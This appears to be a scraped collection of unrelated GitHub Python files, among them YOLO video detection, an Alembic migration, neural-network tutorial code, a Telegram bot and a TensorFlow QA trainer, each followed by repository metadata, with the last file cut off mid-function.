x = int(center_X - (box_width / 2))
y = int(center_Y - (box_height / 2))
# record box data, confidence, and class ID for the detected (note boxes is 2d)
boxes.append([x, y, int(box_width), int(box_height)])
confidences.append(float(confidence))
classIDs.append(classID)
# with box dimension, we can now call non-maxima suppression (filtering out overlapping)
indices = cv2.dnn.NMSBoxes(boxes, confidences, args["confidence"], args["threshold"])
return boxes, confidences, classIDs, indices
def draw_box(frame, boxes, confidences, classIDs, indices, labels, colors):
"""Draw all bounding boxes."""
if len(indices) > 0:
for i in indices.flatten():
x,y,w,h = boxes[i][0],boxes[i][1],boxes[i][2],boxes[i][3]
# draw, where OpenCV library certainly shines
color = [int(c) for c in colors[classIDs[i]]]
cv2.rectangle(frame, (x, y), (x + w, y + h), color, 1)
object_name = "{}: {:.4f}".format(labels[classIDs[i]], confidences[i])
cv2.putText(frame, object_name, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 1)
return frame
def write_to_video(writer, frame):
"""Initialize writer for first frame."""
if writer is None:
fourcc = cv2.VideoWriter_fourcc(*"mp4v") # or change to *"MJPG")
writer = cv2.VideoWriter(args["output"], fourcc, 30, (frame.shape[1], frame.shape[0]), True)
writer.write(frame)
return writer
def loop_frames(labels, colors, model, out_layer_names, video_stream, writer, frame_width, frame_height, num_frame):
"""Loop through each frame until no frame is grabbed"""
while True:
frame, frame_height, frame_width, grabbed = get_input(video_stream, frame_width, frame_height)
if not grabbed:
# return both parameters for clean_up, breaks out of loop
print("Finished!")
return writer, video_stream
preprocess_input(model, frame)
yolo_output = forward_pass(writer, model, out_layer_names, num_frame)
boxes, confidences, classIDs, indices = filter_output(yolo_output, frame_width, frame_height)
output_frame = draw_box(frame, boxes, confidences, classIDs, indices, labels, colors)
writer = write_to_video(writer, output_frame)
def show_output():
"""Show output as a frame in video stream, press q to exit and update the fps."""
output_stream = cv2.VideoCapture(args["output"])
if (output_stream.isOpened() == False):
print("Error opening video file, try opening it from the output path")
while output_stream.isOpened():
grabbed, frame = output_stream.read()
if grabbed == True:
cv2.imshow('Frame', frame)
# press Q to exit
if cv2.waitKey(25) & 0xFF == ord('q'):
break
else:
break
# clean up output
output_stream.release()
cv2.destroyAllWindows()
def clean_up(writer, video_stream):
"""Stop recording fps and display performance data."""
writer.release()
video_stream.release()
def run():
"""Organize and call the useful functions."""
labels, model, out_layer_names = get_model()
colors = get_color(labels)
video_stream, writer, frame_width, frame_height = init_video()
num_frame = get_frame_number(video_stream)
writer, video_stream = loop_frames(labels, colors, model, out_layer_names, video_stream, writer, frame_width, frame_height, num_frame)
clean_up(writer, video_stream)
show_output()
run()
| Jacklu0831/Real-Time-Object-Detection | 1_YOLO/YOLO_vid.py | YOLO_vid.py | py | 7,575 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "cv2.dnn.readNetFromDarknet",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "cv2.dnn",
"line_number": 28,
"usage_type": "attribute"
},
{
"api_name": "os.pa... |
72263563554 | """Added switch history
Revision ID: b85b82664c28
Revises: 94ccd671cbcd
Create Date: 2021-03-26 15:56:26.634107
"""
from alembic import op
import sqlalchemy as sa
from its_on.utils import AwareDateTime
# revision identifiers, used by Alembic.
revision = 'b85b82664c28'
down_revision = '94ccd671cbcd'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('switch_history',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('switch_id', sa.Integer(), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('new_value', sa.String(length=64), nullable=False),
sa.Column('changed_at', AwareDateTime(), nullable=False),
sa.ForeignKeyConstraint(['switch_id'], ['switches.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('switch_history')
# ### end Alembic commands ###
| best-doctor/its_on | db/migrations/versions/b85b82664c28_added_switch_history.py | b85b82664c28_added_switch_history.py | py | 1,108 | python | en | code | 14 | github-code | 1 | [
{
"api_name": "alembic.op.create_table",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "alembic.op",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "sqlalchemy.Column",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.Integ... |
38075311961 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import animation as animation
import math
#definindo a classe
class Oscilador:
#inicialização
def __init__(self, lado, x, v):
self.m= rob*(lado**3)
self.l= lado
self.x= x
self.v= v
#aceleração
def a(self, x, v):
return (rob-rof)*g*(self.l**3)/self.m - (k/self.m)*(x-x0) - ro*v/self.m
#movimentação
def move(self, t):
at= self.a(self.x, self.v)
self.x= self.x + self.v*dt + 0.5*at*(dt**2)
atem= self.a(self.x, self.v)
vtem= self.v + 0.5*(at+atem)*dt
atem= self.a(self.x, vtem)
self.v= self.v + 0.5*(at+atem)*dt
self.at= self.a(self.x, self.v)
#declaração das variáveis
g= 9.8
lado= 0.1
rob= 8000 #densidade do bloco
rof= 1250 #densidade do fluido
ro= 2 #coeficiente de proporcionalidade
k= 40 #constante elástica
x0= 0.5
dt= 0.1
t= 0
#objeto
o1= Oscilador(lado, 0.51, 0)
#arrays
tmax= 60
t= np.arange(0, tmax, dt)
x= np.zeros(t.size)
v= np.zeros(t.size)
x[0]= o1.x
v[0]= o1.v
for i in range(t.size):
o1.move(t[i])
x[i]= o1.x
v[i]= o1.v
#masterização dos gráficos
fig = plt.figure()
plt.title('Oscilador', fontsize=12)
#gráfico 1
XT=fig.add_subplot(331, xlim=(0, tmax), ylim=(min(x)*1.05, max(x)*1.05))
XT.xaxis.grid(True)
XT.yaxis.grid(True)
plt.setp(XT.get_xticklabels(), visible=False)
plt.xlabel('Tempo (s)')
plt.ylabel('Posicao (m)')
line1, = XT.plot([], [], 'g-', lw=1)
plt.legend(loc='upper right')
#gráfico 2
VT=fig.add_subplot(334, xlim=(0, tmax), ylim=(min(v)*1.05, max(v)*1.05))
VT.xaxis.grid(True)
VT.yaxis.grid(True)
plt.setp(VT.get_xticklabels(), visible=False)
plt.xlabel('Tempo(s)')
plt.ylabel('Velocidade(m/s)')
line2, = VT.plot([], [], 'r-', lw=1)
plt.legend(loc='upper right')
#gráfico 3
VX=fig.add_subplot(122, xlim=(min(x)*1.05, max(x)*1.05), ylim=(min(v)*1.05, max(v)*1.05))
VX.xaxis.grid(True)
VX.yaxis.grid(True)
plt.setp(VX.get_xticklabels(), visible=False)
plt.xlabel('Posicao (m)')
plt.ylabel('Velocidade (m/s)')
line3, = VX.plot([], [], 'b.', lw=0.5)
plt.legend(loc='upper right')
#animação
def init():
line1.set_data([],[])
line2.set_data([],[])
line3.set_data([],[])
return line1, line2, line3,
def animate(i):
tt= t[:i]
xx= x[:i]
vv= v[:i]
line1.set_data(tt, xx)
line2.set_data(tt, vv)
line3.set_data(xx, vv)
return line1, line2, line3,
#execução da animação
anim= animation.FuncAnimation(fig, animate, init_func= init, frames= t.size,
interval= 20, blit= True, repeat= False)
#salvar animação
anim.save('oscilador.mp4', fps=30, extra_args=['-vcodec', 'libx264'])
#mostrar animação
plt.show()
| hugosanc/ProjetoFinal | oscilador.py | oscilador.py | py | 2,610 | python | pt | code | 0 | github-code | 1 | [
{
"api_name": "numpy.arange",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.figure",
"... |
2574010068 | from sdv.model import DataPointFloat, Model
class O2WR(Model):
"""O2WR model.
Attributes
----------
Lambda: sensor
PID 2x (byte AB) and PID 3x (byte AB) - Lambda for wide range/band oxygen sensor
Voltage: sensor
PID 2x (byte CD) - Voltage for wide range/band oxygen sensor
Unit: V
Current: sensor
PID 3x (byte CD) - Current for wide range/band oxygen sensor
Unit: A
"""
def __init__(self, name, parent):
"""Create a new O2WR model."""
super().__init__(parent)
self.name = name
self.Lambda = DataPointFloat("Lambda", self)
self.Voltage = DataPointFloat("Voltage", self)
self.Current = DataPointFloat("Current", self)
| eclipse-velocitas/vehicle-model-python | sdv_model/OBD/O2WR/__init__.py | __init__.py | py | 744 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "sdv.model.Model",
"line_number": 4,
"usage_type": "name"
},
{
"api_name": "sdv.model.DataPointFloat",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "sdv.model.DataPointFloat",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "sdv.... |
13337504275 | ##평균 제곱 오차
import numpy as np
def mean_squared_error(y, t):
return 0.5 * np.sum((y-t)**2)
t = [0, 0, 1, 0, 0, 0, 0, 0, 0, 0]
y = [0.1, 0.05, 0.6, 0.0, 0.05, 0.1, 0.0, 0.1, 0.0, 0.0]
print(mean_squared_error(np.array(y), np.array(t)))
y = [0.1, 0.05, 0.1, 0.0, 0.05, 0.1, 0.0, 0.6, 0.0, 0.0]
print(mean_squared_error(np.array(y), np.array(t)))
##교차 엔트로피 오차
import numpy as np
def mean_squared_error2(y, t):
'''
평균 제곱 오차를 반환합니다.
입력:
y: 출력 데이터
x: 타겟 레이블, 원-핫 인코딩
'''
return 0.5 * np.sum((y - t) ** 2)
def cross_entropy_error(y, t):
delta = 1e-7
return -np.sum(t * np.log(y + delta))
cross_entropy_error(y, t)
y = np.array([0.1, 0.05, 0.6, 0.0, 0.05, 0.1, 0.0, 0.1, 0.0, 0.0])
cross_entropy_error(y, t)
t = np.array([0, 0, 1, 0, 0, 0, 0, 0, 0, 0])
y = np.array([0.1, 0.05, 0.1, 0.0, 0.05, 0.1, 0.0, 0.6, 0.0, 0.0])
##미니 배치 교차 엔트로피
def cross_entropy_error2(y, t):
if y.ndim == 1:
t = t.reshape(1, t.size)
y = y.reshape(1, y.size)
batch_size = y.shape[0]
return -np.sum(t * np.log(y + 1e-7)) / batch_size
# 정답 레이블이 '2', '7'과 같은 숫자 레이블로 주어진 경우
def cross_entropy_error3(y, t):
if y.ndim == 1:
t = t.reshape(1, t.size)
y = y.reshape(1, y.size)
batch_size = y.shape[0]
return -np.sum(np.log(y[np.arange(batch_size), t])) / batch_size
# 수치 미분
def numerical_diff(f, x):
h = 1e-4
return (f(x+h) - f(x-h)) / (2*h)
x = np.arange(0.0, 20.0, 0.1)
def function_1(x):
return 0.01*x**2 + 0.1*x
y = function_1(x)
import matplotlib.pyplot as plt
plt.xlabel("x")
plt.ylabel("f(x)")
plt.plot(x, y)
plt.show()
#기울기
def numerical_gradient(f, x):
h = 1e-4
grad = np.zeros_like(x)
for idx in range(x.size):
tmp_val = x[idx]
x[idx] = tmp_val + h
fxh1 = f(x)
x[idx] = tmp_val - h
fxh2 = f(x)
grad[idx] = (fxh1 - fxh2) / (2*h)
x[idx] = tmp_val
return grad
# 차원에 상관없이 반복자를 지정
def numerical_gradient2(f, x):
h = 1e-4 # 0.0001
grad = np.zeros_like(x)
it = np.nditer(x, flags=['multi_index'], op_flags=['readwrite'])
while not it.finished:
idx = it.multi_index
tmp_val = x[idx]
x[idx] = float(tmp_val) + h
fxh1 = f(x) # f(x+h)
x[idx] = tmp_val - h
fxh2 = f(x) # f(x-h)
grad[idx] = (fxh1 - fxh2) / (2*h)
x[idx] = tmp_val # 값 복원
it.iternext()
return grad
##경사하강법
def gradient_descent(f, init_x, lr=0.01, step_num=100):
x = init_x
for i in range(step_num):
grad = numerical_gradient(f, x)
x -= lr * grad
return x
def function_2(x):
return x[0]**2 + x[1]**2
init_x = np.array([-3.0, 4.0])
gradient_descent(function_2, init_x=init_x, lr=0.1, step_num=100)
def softmax(a):
c = np.max(a)
exp_a = np.exp(a - c)
sum_exp_a = np.sum(exp_a)
y = exp_a / sum_exp_a
return y
class simpleNet:
def __init__(self):
self.W = np.random.randn(2, 3)
def predict(self, x):
return np.dot(x, self.W)
def loss(self, x, t):
z = self.predict(x)
y = softmax(z)
loss = cross_entropy_error(y, t)
return loss
##신경망 학습
# coding: utf-8
import sys, os
sys.path.append(os.pardir) # 부모 디렉터리의 파일을 가져올 수 있도록 설정
from common.functions import *
from common.gradient import numerical_gradient
class TwoLayerNet:
def __init__(self, input_size, hidden_size, output_size, weight_init_std=0.01):
# 가중치 초기화
self.params = {}
self.params['W1'] = weight_init_std * np.random.randn(input_size, hidden_size)
self.params['b1'] = np.zeros(hidden_size)
self.params['W2'] = weight_init_std * np.random.randn(hidden_size, output_size)
self.params['b2'] = np.zeros(output_size)
def predict(self, x):
W1, W2 = self.params['W1'], self.params['W2']
b1, b2 = self.params['b1'], self.params['b2']
a1 = np.dot(x, W1) + b1
z1 = sigmoid(a1)
a2 = np.dot(z1, W2) + b2
y = softmax(a2)
return y
# x : 입력 데이터, t : 정답 레이블
def loss(self, x, t):
y = self.predict(x)
return cross_entropy_error(y, t)
def accuracy(self, x, t):
y = self.predict(x)
y = np.argmax(y, axis=1)
t = np.argmax(t, axis=1)
accuracy = np.sum(y == t) / float(x.shape[0])
return accuracy
# x : 입력 데이터, t : 정답 레이블
def numerical_gradient(self, x, t):
loss_W = lambda W: self.loss(x, t)
grads = {}
grads['W1'] = numerical_gradient(loss_W, self.params['W1'])
grads['b1'] = numerical_gradient(loss_W, self.params['b1'])
grads['W2'] = numerical_gradient(loss_W, self.params['W2'])
grads['b2'] = numerical_gradient(loss_W, self.params['b2'])
return grads
def gradient(self, x, t):
W1, W2 = self.params['W1'], self.params['W2']
b1, b2 = self.params['b1'], self.params['b2']
grads = {}
batch_num = x.shape[0]
# forward
a1 = np.dot(x, W1) + b1
z1 = sigmoid(a1)
a2 = np.dot(z1, W2) + b2
y = softmax(a2)
# backward
dy = (y - t) / batch_num
grads['W2'] = np.dot(z1.T, dy)
grads['b2'] = np.sum(dy, axis=0)
da1 = np.dot(dy, W2.T)
dz1 = sigmoid_grad(a1) * da1
grads['W1'] = np.dot(x.T, dz1)
grads['b1'] = np.sum(dz1, axis=0)
return grads
# coding: utf-8
import sys, os
sys.path.append(os.pardir) # 부모 디렉터리의 파일을 가져올 수 있도록 설정
import numpy as np
import matplotlib.pyplot as plt
from dataset.mnist import load_mnist
from two_layer_net import TwoLayerNet
# 데이터 읽기
(x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label=True)
network = TwoLayerNet(input_size=784, hidden_size=50, output_size=10)
# 하이퍼파라미터
iters_num = 10000 # 반복 횟수를 적절히 설정한다.
train_size = x_train.shape[0]
batch_size = 100 # 미니배치 크기
learning_rate = 0.1
train_loss_list = []
train_acc_list = []
test_acc_list = []
# 1에폭당 반복 수
iter_per_epoch = max(train_size / batch_size, 1)
for i in range(iters_num):
# 미니배치 획득
batch_mask = np.random.choice(train_size, batch_size)
x_batch = x_train[batch_mask]
t_batch = t_train[batch_mask]
# 기울기 계산
#grad = network.numerical_gradient(x_batch, t_batch)
grad = network.gradient(x_batch, t_batch)
# 매개변수 갱신
for key in ('W1', 'b1', 'W2', 'b2'):
network.params[key] -= learning_rate * grad[key]
# 학습 경과 기록
loss = network.loss(x_batch, t_batch)
train_loss_list.append(loss)
# 1에폭당 정확도 계산
if i % iter_per_epoch == 0:
train_acc = network.accuracy(x_train, t_train)
test_acc = network.accuracy(x_test, t_test)
train_acc_list.append(train_acc)
test_acc_list.append(test_acc)
print("train acc, test acc | " + str(train_acc) + ", " + str(test_acc))
# 그래프 그리기
markers = {'train': 'o', 'test': 's'}
x = np.arange(len(train_acc_list))
plt.plot(x, train_acc_list, label='train acc')
plt.plot(x, test_acc_list, label='test acc', linestyle='--')
plt.xlabel("epochs")
plt.ylabel("accuracy")
plt.ylim(0, 1.0)
plt.legend(loc='lower right')
plt.show()
| hongjw1938/machine_learning_study | python_class/deep_learning/deep learning from scratch/neural_network_04.py | neural_network_04.py | py | 7,961 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "numpy.sum",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "numpy.sum",
"line_number": 29,
... |
28404000694 | import os
import pandas as pd
import sqlalchemy
#Definindo uma string de conexão
str_connection = 'sqlite:///{path_to_data}'
# Os endereços do projeto e sub-pastas
BASE_DIR = os.path.dirname( os.path.dirname(os.path.abspath(__file__)))
DATA_DIR = os.path.join(BASE_DIR,'data')
# Encontrando os arquivos de dados
files_names = [i for i in os.listdir(DATA_DIR) if i.endswith('.csv')]
# Abrindo uma conexão com o banco...
connection = sqlalchemy.create_engine(str_connection.format(path_to_data = os.path.join(DATA_DIR, 'olist.db')))
# Para cada Arquivo é realizado uma inserção no banco
for i in files_names:
df_tmp = pd.read_csv(os.path.join (DATA_DIR, i))
table_name = "tb_" + i.strip(".csv").replace("olist_", "").replace("_dataset","")
df_tmp.to_sql(table_name, connection) | esrodrigues01/Projetos-em-Python | src/upload_data_local.py | upload_data_local.py | py | 802 | python | pt | code | 0 | github-code | 1 | [
{
"api_name": "os.path.dirname",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "os.path.abspath",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line... |
4017006848 | """Controller class file."""
from gpiozero import Button
from time import sleep
class Controller(object):
def __init__(self, up_pin: int, down_pin: int, left_pin: int, right_pin: int, back_pin: int, enter_pin: int):
"""
Initialize controller.
:param up_pin: pin controlling the UP button
:param down_pin: pin controlling the DOWN button
:param left_pin: pin controlling the LEFT button
:param right_pin: pin controlling the RIGHT button
:param back_pin: pin controlling the BACK button
:param enter_pin: pin controlling the ENTER button
"""
self.up = Button(up_pin)
self.down = Button(down_pin)
self.left = Button(left_pin)
self.right = Button(right_pin)
self.back = Button(back_pin)
self.enter = Button(enter_pin)
def get_input(self) -> str:
"""
Get user's input on the controller.
:return: string indicating the user's input. Possible values are "UP", "DOWN", "LEFT", "RIGHT", "BACK", "ENTER"
"""
while True:
if self.up.is_pressed:
return "UP"
elif self.down.is_pressed:
return "DOWN"
elif self.left.is_pressed:
return "LEFT"
elif self.right.is_pressed:
return "RIGHT"
elif self.back.is_pressed:
return "BACK"
elif self.enter.is_pressed:
return "ENTER"
sleep(0.01)
| Marten-M/GAGMehhatroonikaklubi | src/classes/chessrobot/controller/controller.py | controller.py | py | 1,521 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "gpiozero.Button",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "gpiozero.Button",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "gpiozero.Button",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "gpiozero.Button",
... |
32184257693 | import sys
import asyncio
from aioconsole import ainput
async def input_loop(loop):
while True:
input_ = await ainput(loop=loop)
if input_ == "@end":
sys.exit(0)
print(f"Echo: {input_}")
if __name__ == "__main__":
loop = asyncio.get_event_loop()
loop.run_until_complete(input_loop(loop))
| metamarcdw/async-interface | test.py | test.py | py | 338 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "aioconsole.ainput",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "sys.exit",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "asyncio.get_event_loop",
"line_number": 13,
"usage_type": "call"
}
] |
2417852779 | """Auth urls."""
from django.urls import path
from apps.vmc_auth import views
app_name = "auth"
urlpatterns = [
path("accounts/signup/", views.signup, name="signup"),
# path("accounts/signin/", views.signin, name="signin"),
path("accounts/signin/", views.LoginView.as_view(), name="signin"),
path("accounts/signin/#signin-modal", views.signin, name="signin_modal"),
path("accounts/profile/", views.ProfileView.as_view(), name="profile"),
path("accounts/signout", views.user_logout, name="signout"),
path(
"accounts/profile/delete/<int:pk>/",
views.DeleteAccount.as_view(),
name="delete_account",
),
]
| dje-1000111/bacasand | apps/vmc_auth/urls.py | urls.py | py | 659 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "django.urls.path",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "apps.vmc_auth.views.signup",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "apps.vmc_auth.views",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "dja... |
71968934434 | import telebot
from telebot import types
bot = telebot.TeleBot('')
@bot.message_handler(commands=['start'])
def start(message):
mess = f'Привет, <b>{message.from_user.first_name} {message.from_user.last_name}</b>'
bot.send_message(message.chat.id, mess, parse_mode='html')
@bot.message_handler(commands=['website'])
def website(message):
markup = types.InlineKeyboardMarkup()
markup.add(types.InlineKeyboardButton("Посетить веб сайт", url="https://hestiamaks.ml"))
bot.send_message(message.chat.id, "Перейдите на сайт!", reply_markup=markup)
@bot.message_handler(commands=['help'])
def website(message):
markup = types.ReplyKeyboardMarkup(resize_keyboard=True, row_width=1)
website = types.KeyboardButton('Веб сайт')
start = types.KeyboardButton('Старт')
markup.add(website, start)
bot.send_message(message.chat.id, "Перейдите на сайт!", reply_markup=markup)
@bot.message_handler(content_types=['text'])
def get_user_text(message):
if message.text == "Hello":
bot.send_message(message.chat.id, "И тебе привет!", parse_mode='html')
elif message.text == "Id":
bot.send_message(message.chat.id, f"Твой ID:{message.from_user.id}", parse_mode='html')
else:
bot.send_message(message.chat.id, "мне не понятно!", parse_mode='html')
bot.polling(none_stop=True)
| markess/hestiamaks | tgbot.py | tgbot.py | py | 1,426 | python | ru | code | 0 | github-code | 1 | [
{
"api_name": "telebot.TeleBot",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "telebot.types.InlineKeyboardMarkup",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "telebot.types",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "teleb... |
37276683325 | """
--- Day 13: Knights of the Dinner Table ---
In years past, the holiday feast with your family hasn't gone so well. Not everyone gets along! This year, you resolve,
will be different. You're going to find the optimal seating arrangement and avoid all those awkward conversations.
You start by writing up a list of everyone invited and the amount their happiness would increase or decrease if they
were to find themselves sitting next to each other person. You have a circular table that will be just big enough to fit
everyone comfortably, and so each person will have exactly two neighbors.
For example, suppose you have only four attendees planned, and you calculate their potential happiness as follows:
Alice would gain 54 happiness units by sitting next to Bob.
Alice would lose 79 happiness units by sitting next to Carol.
Alice would lose 2 happiness units by sitting next to David.
Bob would gain 83 happiness units by sitting next to Alice.
Bob would lose 7 happiness units by sitting next to Carol.
Bob would lose 63 happiness units by sitting next to David.
Carol would lose 62 happiness units by sitting next to Alice.
Carol would gain 60 happiness units by sitting next to Bob.
Carol would gain 55 happiness units by sitting next to David.
David would gain 46 happiness units by sitting next to Alice.
David would lose 7 happiness units by sitting next to Bob.
David would gain 41 happiness units by sitting next to Carol.
Then, if you seat Alice next to David, Alice would lose 2 happiness units (because David talks so much), but David would
gain 46 happiness units (because Alice is such a good listener), for a total change of 44.
If you continue around the table, you could then seat Bob next to Alice (Bob gains 83, Alice gains 54). Finally, seat
Carol, who sits next to Bob (Carol gains 60, Bob loses 7) and David (Carol gains 55, David gains 41).
The arrangement looks like this:
+41 +46
+55 David -2
Carol Alice
+60 Bob +54
-7 +83
After trying every other seating arrangement in this hypothetical scenario, you find that this one is the most optimal,
with a total change in happiness of 330.
What is the total change in happiness for the optimal seating arrangement of the actual guest list?
--- Part Two ---
In all the commotion, you realize that you forgot to seat yourself. At this point, you're pretty apathetic toward the
whole thing, and your happiness wouldn't really go up or down regardless of who you sit next to. You assume everyone
else would be just as ambivalent about sitting next to you, too.
So, add yourself to the list, and give all happiness relationships that involve you a score of 0.
What is the total change in happiness for the optimal seating arrangement that actually includes yourself?
"""
from itertools import permutations
def parse(data: [str]) -> (dict, set):
scores = {}
people = set()
for line in data:
person1, _, way, units, person2 = line[:-1].replace("happiness units by sitting next to ", "").split(" ")
people.add(person1)
people.add(person2)
scores[(person1, person2)] = int(units) if way == "gain" else int(units) * -1
scores[(person1, "Me")] = 0
scores[("Me", person1)] = 0
scores[(person2, "Me")] = 0
scores[("Me", person2)] = 0
return (scores, people)
def calc_happiness() -> int:
chairs = len(people)
happiness = []
for perm in permutations(people):
change = 0
for i in range(chairs):
j = i + 1
if j >= chairs:
j = 0
person1 = perm[i]
person2 = perm[j]
score1 = scores[(person1, person2)]
score2 = scores[(person2, person1)]
change += score1 + score2
happiness.append(change)
return max(happiness)
#
#
inputdata = open("input.data").read().strip().splitlines()
scores, people = parse(inputdata)
print("Part 1:", calc_happiness())
people.add("Me")
print("Part 2:", calc_happiness())
| ochelset/advent-of-code | 2015/Day 13/13.py | 13.py | py | 4,022 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "itertools.permutations",
"line_number": 73,
"usage_type": "call"
}
] |
44032736509 | from __future__ import annotations
import pytest
from mocksafe import MockProperty, mock, stub, that
class Philosopher:
@property
def meaning_of_life(self: Philosopher) -> str:
return "42"
def test_mock_getter_prop():
mock_meaning: MockProperty[str] = MockProperty("")
philosopher: Philosopher = mock(Philosopher)
stub(philosopher).meaning_of_life = mock_meaning
with pytest.raises(TypeError):
stub(philosopher).meaning_of_life = MockProperty(123)
with pytest.raises(AttributeError):
stub(philosopher).foobar = mock_meaning
assert philosopher.meaning_of_life == ""
mock_meaning.return_value = (
"Try and be nice to people, avoid eating fat, "
"read a good book every now and then, get "
"some walking in, and try and live together "
"in peace and harmony with people of all "
"creeds and nations."
)
assert "be nice" in philosopher.meaning_of_life
assert "live together in peace" in philosopher.meaning_of_life
assert that(mock_meaning).was_called
assert that(mock_meaning).num_calls == 3
assert that(mock_meaning).last_call == ()
| dmayo3/mocksafe | tests/test_props.py | test_props.py | py | 1,167 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "mocksafe.MockProperty",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "mocksafe.mock",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "mocksafe.stub",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "pytest.raises",
... |
24782913768 |
import sys
import time
import numpy as np
import logging
import tensorflow as tf
from os.path import join as pjoin
from tqdm import tqdm
from evaluate import f1_score, exact_match_score
class QaSystemSolver(object):
def __init__(self, model, dataset, answers, raw_answers, rev_vocab, **kwargs):
self.model = model
self.dataset = dataset
self.answers = answers
self.raw_answers = raw_answers
self.rev_vocab = rev_vocab
self.batch_size = kwargs.pop('batch_size', 64)
self.start_lr = kwargs.pop('start_lr', 0.0001)
self.epochs = kwargs.pop('epochs', 5)
self.start_steps = kwargs.pop('start_steps', 0)
self.print_every = kwargs.pop('print_every', 1000)
self.save_every = kwargs.pop('save_every', 1000)
self.save_every_epoch = kwargs.pop('save_every_epoch', True)
self.sample = kwargs.pop('sample', 0)
self.debug_num = kwargs.pop('debug_num', 0)
self.max_grad_norm = kwargs.pop('max_grad_norm', 5.0)
self.opt = kwargs.pop('opt', 'adam')
self.train_dir = kwargs.pop('train_dir', 'output/train')
self.summary_dir = kwargs.pop('summary_dir', 'output/tensorboard/summary')
if self.opt == "adam":
self.optimizer = tf.train.AdamOptimizer
self.global_step = tf.Variable(self.start_steps, trainable=False)
self.starter_learning_rate = tf.placeholder(tf.float32, name='start_lr')
def train(self):
tic = time.time()
params = tf.trainable_variables()
num_params = sum(map(lambda t: np.prod(tf.shape(t.value()).eval()), params))
toc = time.time()
logging.info("Number of params: %d (retreival took %f secs)" % (num_params, toc - tic))
# train_context -> (num, 2, max_length)
train_context = np.array(self.dataset['train_context'])
train_question = np.array(self.dataset['train_question'])
# train_answer -> (num, 2)
train_answer = np.array(self.answers['train_answer'])
if self.debug_num:
assert isinstance(self.debug_num, int), 'the debug number should be a integer'
assert self.debug_num < len(train_answer), 'check debug number!'
train_answer = train_answer[0:self.debug_num]
train_context = train_context[0:self.debug_num]
train_question = train_question[0:self.debug_num]
print_every = 5
num_example = len(train_answer)
logging.info('num example is {}'.format(num_example))
shuffle_list = np.arange(num_example)
learning_rate = tf.train.exponential_decay(self.starter_learning_rate, self.model.global_step,
1000, 0.9, staircase=True)
tf.summary.scalar('learning_rate', learning_rate)
with tf.name_scope('optimizer'):
optimizer = self.optimizer(learning_rate)
grad_var = optimizer.compute_gradients(self.model.final_loss)
grad = [i[0] for i in grad_var]
var = [i[1] for i in grad_var]
grad_norm = tf.global_norm(grad)
tf.summary.scalar('grad_norm', grad_norm)
grad, use_norm = tf.clip_by_global_norm(grad, self.max_grad_norm)
train_op = optimizer.apply_gradients(zip(grad, var), global_step=self.model.global_step)
saver = tf.train.Saver()
merged = tf.summary.merge_all()
losses = []
norms = []
train_evals = []
val_evals = []
iters = self.start_steps
save_path = pjoin(self.train_dir, 'weights')
batch_size = self.batch_size
batch_num = int(num_example * 1.0 / batch_size)
total_iterations = self.epochs * batch_num + self.start_steps
config = tf.ConfigProto(allow_soft_placement=True)
config.gpu_options.allow_growth = True
with tf.Session(config=config) as sess:
train_writer = tf.summary.FileWriter(self.summary_dir + str(self.start_lr),
sess.graph)
tic = time.time()
for ep in range(self.epochs):
np.random.shuffle(shuffle_list)
train_context = train_context[shuffle_list]
train_question = train_question[shuffle_list]
train_answer = train_answer[shuffle_list]
logging.info('training epoch ---- {}/{} -----'.format(ep + 1, self.epochs))
ep_loss = 0.
for it in xrange(batch_num):
sys.stdout.write('> %d / %d \r' % (iters % print_every, print_every))
sys.stdout.flush()
context = train_context[it * batch_size: (it + 1) * batch_size]
question = train_question[it * batch_size: (it + 1) * batch_size]
answer = train_answer[it * batch_size: (it + 1) * batch_size]
input_feed = self.load_input_feed(context, question, answer)
